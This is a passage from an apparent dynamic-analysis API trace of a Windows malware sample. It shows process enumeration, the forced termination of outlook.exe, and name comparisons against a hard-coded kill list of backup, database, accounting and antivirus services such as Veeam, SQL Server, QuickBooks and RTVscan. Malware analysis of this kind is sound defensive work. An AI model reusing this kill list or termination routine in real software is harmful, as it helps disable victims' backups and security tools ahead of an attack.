th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="tablet.exe")) returned 1 [0064.979] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="essex_serious.exe")) returned 1 [0064.980] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fbi-conflicts.exe")) returned 1 [0064.981] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x600, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="madisoncorn.exe")) returned 1 [0064.982] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="treaty restoration.exe")) returned 1 [0064.983] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ministries_vegetable_facilitate.exe")) returned 1 [0064.984] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x648, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0064.984] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x634, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0064.985] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0064.986] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0064.986] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x734, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0064.987] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0064.988] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x31c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0064.988] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x534, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0064.989] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0064.990] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0064.990] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0064.991] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0064.991] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0064.992] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0064.993] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0064.994] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0064.994] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0064.995] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x82c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0064.996] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0064.997] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0064.998] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x85c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0064.999] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0065.001] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0065.002] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x88c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0065.003] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0065.004] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0065.005] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0065.006] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0065.007] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0065.008] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0065.009] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x8fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0065.010] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0065.011] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x91c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0065.012] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0065.013] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x93c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0065.014] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x94c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0065.015] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x95c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0065.016] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x96c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0065.017] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x97c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0065.018] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x98c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0065.018] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x99c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0065.019] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0065.020] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0065.021] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0065.022] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="reunion fabrics fed.exe")) returned 1 [0065.023] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="work_merchants_mighty.exe")) returned 1 [0065.024] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x9fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="substances.exe")) returned 1 [0065.025] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="holy.exe")) returned 1 [0065.026] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="debut-debate-acquisition.exe")) returned 1 [0065.027] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0065.028] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0065.029] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0065.030] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0065.031] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0065.031] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bcrqdk.exe")) returned 1 [0065.032] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0065.032] Process32Next (in: hSnapshot=0x198, lppe=0x219ea10 | out: lppe=0x219ea10*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 0 [0065.033] CloseHandle (hObject=0x198) returned 1 [0065.033] GetCurrentProcessId () returned 0x2a8 [0065.033] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=1, dwProcessId=0x82c) returned 0x198 [0065.033] TerminateProcess (hProcess=0x198, uExitCode=0x1) returned 1 [0065.034] CloseHandle (hObject=0x198) returned 1 [0065.034] wvsprintfA (in: param_1=0x219e5f8, param_2="Killed process: %s [pid: %ld]", arglist=0x219eb38 | out: param_1="Killed process: outlook.exe [pid: 2092]") returned 39 [0065.034] wsprintfA (in: param_1=0x219e5f8, param_2="%s\r\n" | out: param_1="Killed process: outlook.exe [pid: 2092]\r\n") returned 41 [0065.034] GetLocalTime (in: lpSystemTime=0x219eaf8 | out: lpSystemTime=0x219eaf8*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x6, wDay=0x1c, wHour=0x8, wMinute=0x13, wSecond=0x2f, wMilliseconds=0x2c8)) [0065.034] wsprintfA (in: param_1=0x219e9f8, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[08:19:47] ") returned 11 [0065.034] SetThreadUILanguage (LangId=0x409) returned 0x409 [0065.034] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xa) returned 1 [0065.153] WriteFile (in: hFile=0x7, lpBuffer=0x219e9f8*, nNumberOfBytesToWrite=0xb, lpNumberOfBytesWritten=0x219eb24, lpOverlapped=0x0 | out: lpBuffer=0x219e9f8*, lpNumberOfBytesWritten=0x219eb24*=0xb, lpOverlapped=0x0) returned 1 [0065.153] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1 [0065.153] WriteFile (in: hFile=0x7, lpBuffer=0x219e5f8*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x219eb24, lpOverlapped=0x0 | out: lpBuffer=0x219e5f8*, lpNumberOfBytesWritten=0x219eb24*=0x29, lpOverlapped=0x0) returned 1 [0065.154] GetConsoleWindow () returned 0x5011c [0065.154] IsWindowVisible (hWnd=0x5011c) returned 0 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="powerpnt") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="steam") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="thebat") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="thunderbird") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="visio") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="winword") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="wordpad") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="bedbh") returned 1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="vxmon") returned -1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="benetns") returned 1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="bengien") returned 1 [0065.154] lstrcmpiA (lpString1="outlook", lpString2="pvlsvr") returned -1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="beserver") returned 1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="raw_agent_svc") returned -1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="vsnapvss") returned -1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="CagService") returned 1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="DellSystemDetect") returned 1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="EnterpriseClient") returned 1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="VeeamNFSSvc") returned -1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="VeeamTransportSvc") returned -1 [0065.155] lstrcmpiA (lpString1="outlook", lpString2="VeeamDeploymentSvc") returned -1 [0065.155] Process32Next (in: hSnapshot=0x194, lppe=0x219fc48 | out: lppe=0x219fc48*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x83c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0065.156] PathRemoveExtensionA (in: pszPath="pidgin.exe" | out: pszPath="pidgin") [0065.156] lstrcmpiA (lpString1="pidgin", lpString2="wxServer") returned -1 [0065.156] lstrcmpiA (lpString1="pidgin", lpString2="wxServerView") returned -1 [0065.156] lstrcmpiA (lpString1="pidgin", lpString2="Sqlservr") returned -1 [0065.156] lstrcmpiA (lpString1="pidgin", lpString2="RAgui") returned -1 [0065.156] lstrcmpiA (lpString1="pidgin", lpString2="supervise") returned -1 [0065.156] lstrcmpiA (lpString1="pidgin", lpString2="Culture") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="RTVscan") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="Defwatch") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="sqlbrowser") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="winword") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="QBW32") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="QBDBMgr") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="qbupdate") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="QBCFMonitorService") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="axlbridge") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="QBIDPService") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="httpd") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="fdlauncher") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="MsDtSrvr") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="tomcat6") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="java") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="360se") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="360doctor") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="wdswfsafe") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="fdhost") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="GDscan") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="ZhuDongFangYu") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="QBDBMgrN") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="sqlwriter") returned -1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="mysqld") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="AutodeskDesktopApp") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="acwebbrowser") returned 1 [0065.157] lstrcmpiA (lpString1="pidgin", lpString2="Creative Cloud") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="Adobe Desktop Service") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="CoreSync") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="Adobe CEF Helper") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="node") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="AdobeIPCBroker") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="sync-taskbar") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="sync-worker") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="InputPersonalization") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="AdobeCollabSync") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="BrCtrlCntr") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="BrCcUxSys") returned 1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="SimplyConnectionManager") returned -1 [0065.158] lstrcmpiA (lpString1="pidgin", lpString2="Simply.SystemTrayIcon") returned -1 [0065.158] 